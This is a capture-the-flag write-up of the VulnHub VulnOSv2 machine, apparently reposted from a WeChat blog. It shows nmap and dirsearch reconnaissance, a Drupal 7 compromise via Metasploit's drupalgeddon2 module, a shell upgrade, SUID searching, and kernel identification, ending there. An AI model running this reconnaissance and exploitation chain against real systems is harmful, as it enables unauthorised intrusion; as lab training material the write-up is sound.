1. Information Gathering
1.1 Host Scanning
I. nmap
┌──(root㉿W1sh)-[~]
└─# nmap -T4 -sP 192.168.56.1-255
┌──(root㉿W1sh)-[~]
└─# nmap -T4 -sS -sV -Pn -A -p- --open 192.168.56.104
Ports | Status | Service | Comments |
22 | Opened | OpenSSH 6.6.1p1 | |
80 | Opened | Apache httpd 2.4.7 | |
6667 | Opened | ngicrd |
1.2 Vuln Detecting
I. Port 22/SSH
SearchSploit
Services
Nothing found for OpenSSH 6.6.1
II. Port 80/HTTP
SearchSploit
Services
Nothing found for Apache httpd 2.4.7
Framworks (Penetrated)
Quiet a lot vulnerabilities were found about Drupal 7
Get shell
After test we could use Metasploit
's modlue exploit/unix/webapp/drupal_drupalgeddon2
for done this penetration
Web
dirsearch
┌──(root㉿W1sh)-[~/vulnhub/vulnosv2]
└─# dirsearch -u http://192.168.56.104/jabc/ -t100 -x 404,403,301
Code | Size | Path |
200 | 1KB | http://192.168.56.104/jabc/includes/ |
200 | 1KB | http://192.168.56.104/jabc/install.php |
200 | 1KB | http://192.168.56.104/jabc/install.php?profile=default |
200 | 42B | http://192.168.56.104/jabc/xmlrpc.php |
200 | 117KB | http://192.168.56.104/jabc/includes/bootstrap.inc |
200 | 271B | http://192.168.56.104/jabc/profiles/minimal/minimal.info |
200 | 278B | http://192.168.56.104/jabc/profiles/testing/testing.info |
200 | 459B | http://192.168.56.104/jabc/scripts/ |
200 | 470B | http://192.168.56.104/jabc/templates/ |
200 | 534B | http://192.168.56.104/jabc/themes/ |
200 | 649B | http://192.168.56.104/jabc/robots.txt |
200 | 743B | http://192.168.56.104/jabc/profiles/standard/standard.info |
200 | 849B | http://192.168.56.104/jabc/modules/ |
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
2. Escalation
2.1 Update reverse shell
For better interative.We make thoes changes
meterpreter > shell
Process 2693 created.
Channel 1 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@VulnOSv2:/var/www/html/jabc$
2.2 Users
I. www-data
suid
$ find / -perm -u=s -type f -ls 2>/dev/null
Nothing were useful
crontab
Nothing were useful
2.3 System
I. Kernel (Rooted)
System | Version |
Ubuntu | 14.04.4 LTS |
Kernel | Version | Bits |
Linux | 3.13.0 | i686 |
原文始发于微信公众号(W1sh):[Vulnhub] VulnOSv2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论